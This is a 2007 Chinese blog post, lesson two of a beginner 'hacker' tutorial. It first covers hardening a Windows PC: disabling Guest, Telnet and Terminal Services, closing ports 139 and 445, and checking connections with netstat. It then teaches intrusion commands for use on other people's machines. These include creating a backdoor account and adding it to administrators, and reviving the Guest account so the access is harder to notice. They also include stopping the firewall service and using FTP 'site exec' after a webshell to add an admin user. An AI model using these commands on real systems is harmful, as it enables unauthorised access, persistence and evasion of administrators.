动画教程2

上一篇 / 下一篇  2007-03-29 20:46:38

查看( 16 ) / 评论( 0 ) / 评分( 0 / 0 )
菜鸟黑客教程1-2合集

第二节 系统安全及黑客基本命令

1.系统安全分析及设置
你要想入侵人家,难免人家不入侵你,说不定自己也神不知道鬼不觉的种了人家的木马,一般来说我们的系统都是很安全的的,
不过还是有许多地方需要注意,比如说该打的补丁都把它打上.该设置的地方也都详细设置一下.
另外还需要时不时看下系统的网络连接情况.关于打补丁,每个杀毒软件基本上来说都提供系统漏洞修复功能,
利用它修复就行了,比如说我用的瑞星,它提示我我的系统很安全了.因为该打的补丁都打上了.

2.系统安全设置
到"计算机管理"这里来查看一下,你电脑有没有多出个用户 如果不是你所创建的,八成是黑客创建的,删!
记得把Guest这个用户一定要禁用.然后再到"服务"里面来看看.把TCP/IP NetBIOS Helper禁用 把Telnet禁用
把Terminal Services禁用 到"网上邻居"这里把我刚才演示的地方把它禁用,这样一来139端口就关掉了.
Telnet是23端口,电脑大漏洞,刚才也禁用了.Terminal Services是3389端口刚才也禁用了.还有一个把445端口也禁用,
这个需要到注册表里改,看清楚:打开注册表:运行-regedit-HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters
鼠标点到右边窗口,新建DWORD值 把名字改为:SMBDeviceEnabled 双击,把值改为0 这样一来重点漏洞端口就给关掉了.

3.IP限制策略的导入
我这里已经有了一个IP策略文件,所谓IP策略文件的意思其实可以理解为把本机所有对外常用的端口也封上,
不许任何人通过端口的方式来连接本机[在这里补充一点,"端口"是指计算机连向外面的窗户或大门,你没守好它们,
小偷[黑客或病毒]就很容易趁虚而入]在这一步找到你事先做好的IP策略文件,文件已被打包在此教程里面.
文件名为:Firewall.ipsec 就行了.

4.n网络连接查看与分析命令 netstat -an
为什么要学习这条命令?因为这条命令功能强大,可以利用它详细的查看本机与外界连连的途径与方法,及与哪些程序或IP联系
运行 cmd netstat-an
Proto[连接方式]  Local Address[本机连接地址]    Foreign Address[远程主机地址]    State[连接状态]
其中连接状态[State]共有三种  LISTENING[监听]    ESTABLISHED[成立/连接]   CLOSE_WAIT[正在关闭]
所以通过它们可以很明了的查看电脑正在与哪些程序或网络/IP连接
当然以上查看方式也可通过windows优化大师查看 如果没有安装,个人建议安装一个.通过这里很容易就得知机子有没中木马.

5.黑客常用cmd命令
为什么要学命令?因为很多黑客工具包括入侵手法都需要在命令行下[cmd]完成.所以必需要掌握一些命令

1.新建用户: net user pxp 123456 /add  [其中,pxp是我们新建的用户名,123465是我们设定的密码]

2.提升用户权限 为什么要提升?因为只有提升了,你才能更好的利用或掌控此台电脑.
  命令如下:   net localgroup administrators /add  [其中administrators是指所要提升的用户组,当然一般我们选择管理员组了]

3.删除用户:   net use pxp /del  [其中pxp是要删除的用户名]

4.net user guest /active:yes  [激活guest用户]用此命令可激活被禁止的用户

5.net user guest 792085 [改变guest密码] 为什么要学这条命令? 因为这个guest是系统自带的用户,管理员也无法删除的.
没有新建用户那么容易被发觉

6.net stop sharedaccess  [关防火墙]  net start sharedaccess  [开防火墙]



6.ftp命令:

当我们通过webshell得到一个特殊ftp用户的时候,我们要入侵服务器提权可以使用以下命令[这个特殊用户我们会在以后的入侵过程中得到]

1. open x.x.x.x 打开FTP站点[x.x.x.x 可以是域名/IP] 接着输入用户名和密码当看到230时就说明登陆成功了. quit是退出.

2. quote site exec net user pxp 123456 /add  加用户

3. quote site exec net localgroup administrators pxp /add 提升管理员

4. get xxx/xx.exe [下载路径为xxx/xx.exe的文件]

5. FTP就这几条对我们提权有用,其余没多大用.其余可以通过FTP软件图形化完成,比如说下载上传删除等.


以上就是第二节课的全部内容.

极度深寒原创
QQ:249110793
转载请注明出处. BY 极度深寒原创

导入论坛 引用链接 收藏 分享给好友 推荐到圈子 管理 举报

TAG:

 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

日历

« 2008-07-09  
  12345
6789101112
13141516171819
20212223242526
2728293031  

数据统计

  • 访问量: 970
  • 日志数: 31
  • 图片数: 1
  • 建立时间: 2007-03-29
  • 更新时间: 2007-06-27

RSS订阅

Open Toolbar